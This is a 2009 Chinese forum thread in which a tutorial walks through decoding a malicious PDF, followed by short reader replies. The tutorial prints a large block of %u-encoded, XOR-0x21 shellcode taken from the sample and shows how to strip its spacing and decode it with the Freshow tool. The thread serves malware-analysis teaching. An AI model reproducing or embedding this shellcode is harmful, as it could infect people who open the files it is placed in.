roxiel 发表于 2009-8-20 15:35

网马解密大讲堂——网马解密高级篇002(PDF解密)

by kongzi


一、pdf简介:

    PDF(Portable Document Format)文件格式是Adobe公司开发的电子文件格式。这种文件格式可以运行在任何操作系统平台上,这一特点使它成为在Internet上进行电子文档发行和数字化信息传播的理想文档格式。越来越多的电子图书、产品说明、公司文告、网络资料、电子邮件开始使用PDF格式文件。


二、pdf漏洞简介:

      PDF是由“Adobe Acrobat”制作的,它存在一个攻击漏洞——可以在PDF文档中,利用“Adobe Acrobat”提供的Javascript脚本功能,执行任意攻击命令。
pdf网马和swf网马一样,解密工具都是可以使用htmldecoder工具,解密方法和网马解密高级篇001(SWF解密)一样。今天讲解的这个pdf网马,可以直接使用freshow这个工具来解密,因为这个pdf包含的shellcode直接可以通过记事本看到。
   小技巧:对于pdf或swf格式的文件我们可以通过记事本的方式打开,直接查看文件的源代码,你会有惊奇的发现,尤其是网马解密,里面说不定就有你要的网马地址呢,呵呵。本次讲解同样不提供pdf文件的下载,以免不明网友,下载后运行而导致系统中招。


上图为此次解密pdf网马的源文件代码的部分截图

v a rY T d o w n=u n e s c a p e ( " % u 9 " + " \ x 3 0 " + " 9 0 % u 9 " + " \ x 3 0 " + " 9 0 % u E 1 D 9 % u 3 4 D 9 % u 5 8 2 4 % u 5 8 5 8 % u 3 3 5 8 % u B 3 D B % u 0 3 1 C % u 3 1 C 3 % u 6 6 C 9 % u E 9 8 1 % u F A 6 5 % u 3 0 8 0 % u 4 0 2 1 % u F A E 2 % u 1 7 C 9 % u 2 1 2 2 % u 4 9 2 1 % u 0 1 2 1 % u 2 1 2 1 % u 2 1 4 B % u F 1 D E % u 2 1 9 8 % u 2 1 3 1 % u A A 2 1 % u C A D 9 % u 7 F 2 4 % u 8 5 D 2 % u F 1 D E % u D 7 C 9 % u D E D E % u C 9 D E % u 2 2 1 C % u 2 1 2 1 % u D 9 A A % u 1 9 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 0 6 C % u 2 1 2 1 % u 6 7 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 2 F A % u 2 1 2 1 % u D 9 A A % u 0 3 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 0 6 5 % u 2 1 2 1 % u 1 1 C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 2 A 8 % u 2 1 2 1 % u D 9 A A % u 2 D C 9 % u 2 1 2 1 % u C 9 2 1 % u 2 0 4 0 % u 2 1 2 1 % u 3 B C 9 % u 2 1 2 1 % u C A 2 1 % u 7 2 7 9 % u F D A A % u 4 B 7 2 % u 4 9 6 1 % u 3 1 2 1 % u 2 1 2 1 % u C 9 7 6 % u 2 3 9 0 % u 2 1 2 1 % u C 4 C 9 % u 2 1 2 1 % u 7 9 2 1 % u 7 2 E 2 % u F D A A % u 4 B 7 2 % u 4 9 0 1 % u 3 1 2 1 % u 2 1 2 1 % u C 9 7 6 % u 2 3 B 8 % u 2 1 2 1 % u E C C 9 % u 2 1 2 1 % u 7 9 2 1 % u 7 6 E 2 % u 1 D C 9 % u 2 1 2 5 % u A A 2 1 % u 1 2 D 9 % u 6 8 E 8 % u E 1 1 2 % u E 2 9 1 % u D 3 D D % u A C 8 F % u D E 6 6 % u E 2 7 E % u 1 F 7 A % u 2 6 E 7 % u 1 F 9 9 % u 7 E A 8 % u 4 7 2 0 % u E 6 1 F % u 2 4 6 6 % u C 1 D E % u C 8 E 2 % u 2 5 B 4 % u 2 1 2 1 % u A 0 7 A % u 3 5 C D % u 2 1 2 0 % u A A 2 1 % u 1 F F 5 % u 2 3 E 6 % u 4 C 4 2 % u 0 1 4 5 % u E 6 1 F % u 2 5 6 3 % u 4 2 0 E % u 0 3 0 1 % u E 3 A 2 % u 1 2 2 9 % u 7 1 E 1 % u 4 9 7 1 % u 2 0 2 5 % u 2 1 2 1 % u 7 2 7 3 % u C 9 7 1 % u 2 2 E 0 % u 2 1 2 1 % u F 1 D E % u D D A A % u E 6 A A % u E 1 A 2 % u 1 F 2 9 % u 3 9 A B % u F A A 5 % u 2 2 5 5 % u C A 6 1 % u 1 F D 7 % u 2 1 E 7 % u 1 2 0 3 % u 1 F F 3 % u 7 1 A 9 % u A 2 2 0 % u 7 5 C D % u E 1 1 2 % u F A 1 2 % u E D A A % u D 9 A 2 % u 5 C 7 5 % u 1 F 2 8 % u 3 D A 8 % u A 2 2 0 % u 2 5 E 1 % u D 3 C A % u E D A A % u F 8 A A % u E 2 A 2 % u 1 2 3 1 % u 1 F E 1 % u 6 2 E 6 % u 2 0 0 D % u 2 1 2 1 % u 7 0 2 1 % u 7 1 7 2 % u 7 1 7 1 % u 7 1 7 1 % u 7 6 7 1 % u C 9 7 1 % u 2 2 1 8 % u 2 1 2 1 % u 3 8 C 9 % u 2 1 2 1 % u 4 5 2 1 % u 2 5 8 0 % u 2 1 2 1 % u A C 2 1 % u 4 1 8 1 % u D E D E % u C 9 D E % u 2 2 1 6 % u 2 1 2 1 % u F A 1 2 % u 7 2 7 2 % u 7 2 7 2 % u F 1 D E % u 1 9 A 1 % u A 1 C 9 % u C 8 1 9 % u 2 E 5 4 % u 5 9 A 0 % u B 1 2 4 % u B 1 B 1 % u 5 5 B 1 % u 7 4 2 7 % u C D A A % u 6 1 A C % u D E 2 4 % u C 9 C 1 % u D E 0 F % u D E D E % u C 9 E 2 % u D E 0 9 % u D E D E % u 3 0 9 9 % u 2 5 2 0 % u E 3 A 1 % u 2 1 2 D % u 3 A C 9 % u D E D E % u 1 2 D E % u 7 1 E 1 % u C 9 7 5 % u 2 1 7 5 % u 2 1 2 1 % u C 9 7 1 % u 2 3 A A % u 2 1 2 1 % u F 1 D E % u A 1 1 7 % u 0 5 1 D % u 5 6 2 1 % u C 9 2 B % u 2 3 6 0 % u 2 1 2 1 % u D E 1 2 % u D E 7 6 % u C 9 F 1 % u 2 0 D A % u 2 1 2 1 % u D E 4 9 % u 2 1 2 1 % u D E 2 1 % u C 9 F 1 % u D F C 9 % u D E D E % u 7 6 7 2 % u 1 2 7 7 % u 7 1 E 1 % u C 9 7 5 % u 2 1 3 F % u 2 1 2 1 % u C 9 7 1 % u 2 3 7 4 % u 2 1 2 1 % u F 1 D E % u A 1 1 7 % u 0 5 1 D % u 5 6 2 1 % u C 9 2 B % u 2 3 2 A % u 2 1 2 1 % u D E 1 2 % u D E 7 6 % u 7 9 F 1 % u 7 E 7 F % u E 2 7 A % u 2 3 C A % u E 2 7 9 % u D 8 C 9 % u D E D E % u 7 7 D E % u A 2 7 6 % u 2 9 C D % u D D A A % u 2 9 4 B % u 1 F 7 6 % u 5 6 D E % u C 9 3 5 % u 2 3 7 C % u 2 1 2 1 % u F 1 D E % u D D A A % u 4 0 4 9 % u 4 4 4 C % u 4 9 2 1 % u 6 4 6 8 % u 5 3 6 7 % u D 5 A A % u 2 9 9 8 % u 2 1 2 1 % u D 2 2 1 % u 5 4 8 7 % u 4 B 0 E % u 1 F 2 1 % u 5 5 D E % u 0 1 0 5 % u 0 5 C 9 % u 2 1 2 3 % u D E 2 1 % u A A F 1 % u C 9 D 9 % u 2 0 E A % u 2 1 2 1 % u F 1 D E % u D 9 1 A % u 2 9 5 5 % u A A 1 7 % u 0 5 6 5 % u 1 F 0 1 % u 2 1 D E % u D E 1 F % u 0 5 5 5 % u C 9 3 D % u 2 0 C E % u 2 1 2 1 % u F 1 D E % u E 5 A 2 % u 7 E 3 1 % u 9 9 7 F % u 2 1 2 0 % u 2 1 2 1 % u 4 9 E 2 % u 4 F 4 E % u 2 1 2 1 % u 5 4 4 9 % u 4 D 5 3 % u C A 4 C % u A C 3 4 % u 0 5 6 5 % u 7 1 2 5 % u 0 3 C 9 % u D E D F % u 7 1 D E % u 6 B C 9 % u 2 1 2 3 % u C 8 2 1 % u D F C 3 % u D E D E % u C 7 C 9 % u D E D E % u A 2 D E % u 2 9 E 5 % u 4 B E 2 % u 4 9 4 D % u 5 5 4 F % u 4 D 4 5 % u 3 4 C A % u 6 5 A C % u 2 5 0 5 % u C 9 7 1 % u D C D A % u D E D E % u C 9 7 1 % u 2 3 0 2 % u 2 1 2 1 % u 9 A C 8 % u D E D F % u C 9 D E % u D E C 7 % u D E D E % u E 5 A 2 % u E 2 2 9 % u 1 2 4 9 % u 2 1 1 3 % u 4 9 2 1 % u 5 2 5 4 % u 5 3 4 4 % u 3 4 C A % u 6 5 A C % u 2 5 0 5 % u C 9 7 1 % u D C F 0 % u D E D E % u C 9 7 1 % u 2 0 D 8 % u 2 1 2 1 % u B 0 C 8 % u D E D F % u C 9 D E % u D E C 7 % u D E D E % u E 5 A 2 % u E 2 2 9 % u 4 2 4 9 % u 5 6 5 7 % u 4 9 2 1 % u 4 9 5 2 % u 4 E 4 5 % u 3 4 C A % u 6 5 A C % u 2 5 0 5 % u C 9 7 1 % u D C 8 6 % u D E D E % u C 9 7 1 % u 2 0 E E % u 2 1 2 1 % u 4 6 C 8 % u D E D F % u C 9 D E % u D E C 7 % u D E D E % u E 5 A 2 % u E 2 2 9 % u 5 7 4 9 % u 5 9 4 6 % u C A 2 1 % u A C 3 4 % u 0 5 6 5 % u 7 1 2 5 % u A 3 C 9 % u D E D C % u 7 1 D E % u 8 B C 9 % u 2 1 2 0 % u C 8 2 1 % u D F 6 3 % u D E D E % u C 7 C 9 % u D E D E % u A 2 D E % u 2 5 E 5 % u C 9 E 2 % u 2 0 8 A % u 2 1 2 1 % u 3 A 4 9 % u 6 7 E 7 % u 7 1 5 8 % u E 7 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 B 6 % u 2 1 2 1 % u C D 4 9 % u 2 2 B 6 % u 7 1 2 D % u 9 3 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 A 2 % u 2 1 2 1 % u 8 B 4 9 % u 2 C D D % u 7 1 5 D % u B F C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 4 E % u 2 1 2 1 % u C C 4 9 % u C E 7 7 % u 7 1 1 7 % u A B C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 7 A % u 2 1 2 1 % u D 1 4 9 % u 2 5 A B % u 7 1 7 E % u 5 7 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F D 6 % u D E D E % u 5 9 4 9 % u F A 4 9 % u 7 1 3 D % u 4 3 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 1 2 % u 2 1 2 1 % u C E 4 9 % u C 1 E F % u 7 1 4 1 % u 6 F C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 0 3 E % u 2 1 2 1 % u 9 1 4 9 % u 0 C 6 8 % u 7 1 F A % u 1 B C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D E 1 7 % u D E D E % u 8 A 4 9 % u B A 7 F % u 7 1 3 F % u 0 7 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 8 6 % u D E D E % u 7 8 4 9 % u A 0 B 6 % u 7 1 2 3 % u 3 3 C 9 % u 2 1 2 0 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 1 C 2 % u 2 1 2 1 % u 5 F 4 9 % u C 3 F 9 % u 7 1 5 2 % u D F C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 1 E E % u 2 1 2 1 % u B F 4 9 % u 9 A D 8 % u 7 1 1 4 % u C B C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F B 3 % u D E D E % u 7 6 4 9 % u 9 4 8 1 % u 7 1 9 A % u F 7 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 5 F % u D E D E % u 3 B 4 9 % u 3 F 5 B % u 7 1 2 3 % u E 3 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 4 B % u D E D E % u C 1 4 9 % u 1 1 7 A % u 7 1 B 5 % u 8 F C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 7 7 % u D E D E % u B 6 4 9 % u C 3 E 8 % u 7 1 8 2 % u B B C 9 % u 2 1 2 1 " + " % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 6 3 % u D E D E % u 4 9 4 9 % u E 4 0 5 % u 7 1 9 2 % u A 7 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 " + " % u C 9 E 2 % u 2 1 7 6 % u 2 1 2 1 % u 5 3 4 9 % u 9 2 D F % u 7 1 3 7 % u 5 3 C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u D F 6 5 % u D E D E % u 3 2 C A % u 4 4 4 B % u C 9 7 1 % u D A D 6 % u D E D E % u C 9 7 1 % u D F 8 A % u D E D E % u 9 6 C 8 % u D E D D % u C 9 D E % u D E C 9 % u D E D E % u C 9 E 2 % u D C 8 8 % u D E D E % u 6 E 4 9 % u 6 E C E % u 7 1 2 4 % u 1 F C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u C 9 E 2 % u 2 1 2 E % u 2 1 2 1 % u A F 4 9 % u 2 F 6 F % u 7 1 C D % u 0 B C 9 % u 2 1 2 1 % u A 2 2 1 % u 2 9 E 5 % u 1 2 E 2 % u 4 5 E 1 % u 6 1 A A % u A 4 1 1 % u 5 9 E 1 % u 1 F 3 1 % u 6 1 A A % u 1 F 2 D % u 5 1 A A % u 8 C 3 D % u A A 1 F % u 2 9 6 1 % u C A E 2 % u 1 F 2 A " + " % u 6 1 A A % u A 2 1 5 % u 5 D E 1 % u A A 1 F % u 1 D 6 1 % u 4 1 E 2 % u A A 1 7 % u 0 5 4 D % u 1 7 0 5 % u 6 4 A A % u 1 7 1 D % u 7 5 A A % u 5 9 2 4 % u F 4 2 2 % u A A 1 F % u 3 9 6 B % u A A 1 F % u 0 1 7 B % u F C 2 2 % u 1 A C 2 % u 1 F 6 8 % u 1 5 A A % u 2 2 A A % u 1 2 D 4 % u 1 2 D E % u D D E 1 % u A 5 8 D % u 5 5 E 1 % u E 0 2 6 % u 2 C E E % u D 9 2 2 % u D 5 C A % u 1 A 1 7 % u 0 5 5 D % u 5 4 0 9 % u 1 F F E % u 7 B A A % u 2 2 0 5 % u 4 7 F C % u A A 1 F % u 6 A 2 D % u A A 1 F % u 3 D 7 B % u F C 2 2 % u A A 1 F % u A A 2 5 % u E 4 2 2 % u A 8 1 7 % u 0 5 6 5 % u 4 0 3 D % u C 9 E 2 % u D A 4 7 % u D E D E % u 5 5 4 9 % u 5 1 5 5 % u 0 e 1 b % u 1 4 0 e % u 1 3 4 d % u 1 9 4 e % u 4 2 0 f % u 4 c 4 e % u 5 6 0 e % u 4 3 4 4 % u 1 2 0 e % u 4 4 0 f % u 4 4 5 9 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 2 1 2 1 % u 0 0 2 1



上述代码是从p.pdf源文件中复制出来的shellcode代码。

大家是否看着上述代码有些眼熟吧,还记得前期我们讲解shellcode加密的特征嘛,Shellcode网马特征:以相同分隔符(一般为%u)分隔的4位一组的十六进制字符串。这段代码看着可能有些乱,需要我们先来简单的处理一下。我们先来观察一下上述代码的确和shellcode特征类似,不过其中有很多的空格,ok,那么我们将这些空格取消后再看一下代码。


在这里我们又要用到freshow的过滤功能NULS,NULS的功能就是将代码中的空格过滤掉,使得代码更易阅读。将上述代码粘贴至freshow的上操作区域,在过滤选项中选择NULS后点击filter按钮,具体操作详见截图。





取消空格在下操作区域显示代码的截图。


接下来点击up按钮,将代码上翻至上操作区域,进行shellcode解密(两次esc)


上图为两次esc后截图,我们看到并没有网马的地址,欲知后事如何,接着往下看

为什么两次esc后没有网马地址呢,我们再来仔细分析一下这个shellcode,里面有很多的21,其实这是一个带密钥(XOR21)shellcode,而密钥就是21。ok,我们再来解一下这个shellcode,先进行一次esc后,将代码上翻至上操作区域,在进行二次esc之前,输入密钥21后再esc,详见截图:


最终解密结果详见下图:




frozenrain 发表于 2009-9-3 12:40

这一系列全看完了,学习了!:lol

sky1979 发表于 2009-9-10 17:43

强人啊,我也来学习一下。

xieyuzhe 发表于 2009-9-11 17:37

强大的LZ,不过还没搞的清楚,全部看完先

cai_jay 发表于 2009-9-12 13:21

楼主产量好高

fuma255 发表于 2009-9-16 18:46

楼主是牛人啊,膜拜中

q493632284 发表于 2009-9-16 19:12

看了但是不懂
学习中

挂挂 发表于 2009-9-16 19:46

支持下~~~:)eee

1512 发表于 2009-9-21 17:37

强人啊,我也来学习一下。

上网没意思 发表于 2009-10-16 15:25

学习了 厉害呀,支持
页: [1] 2
查看完整版本: 网马解密大讲堂——网马解密高级篇002(PDF解密)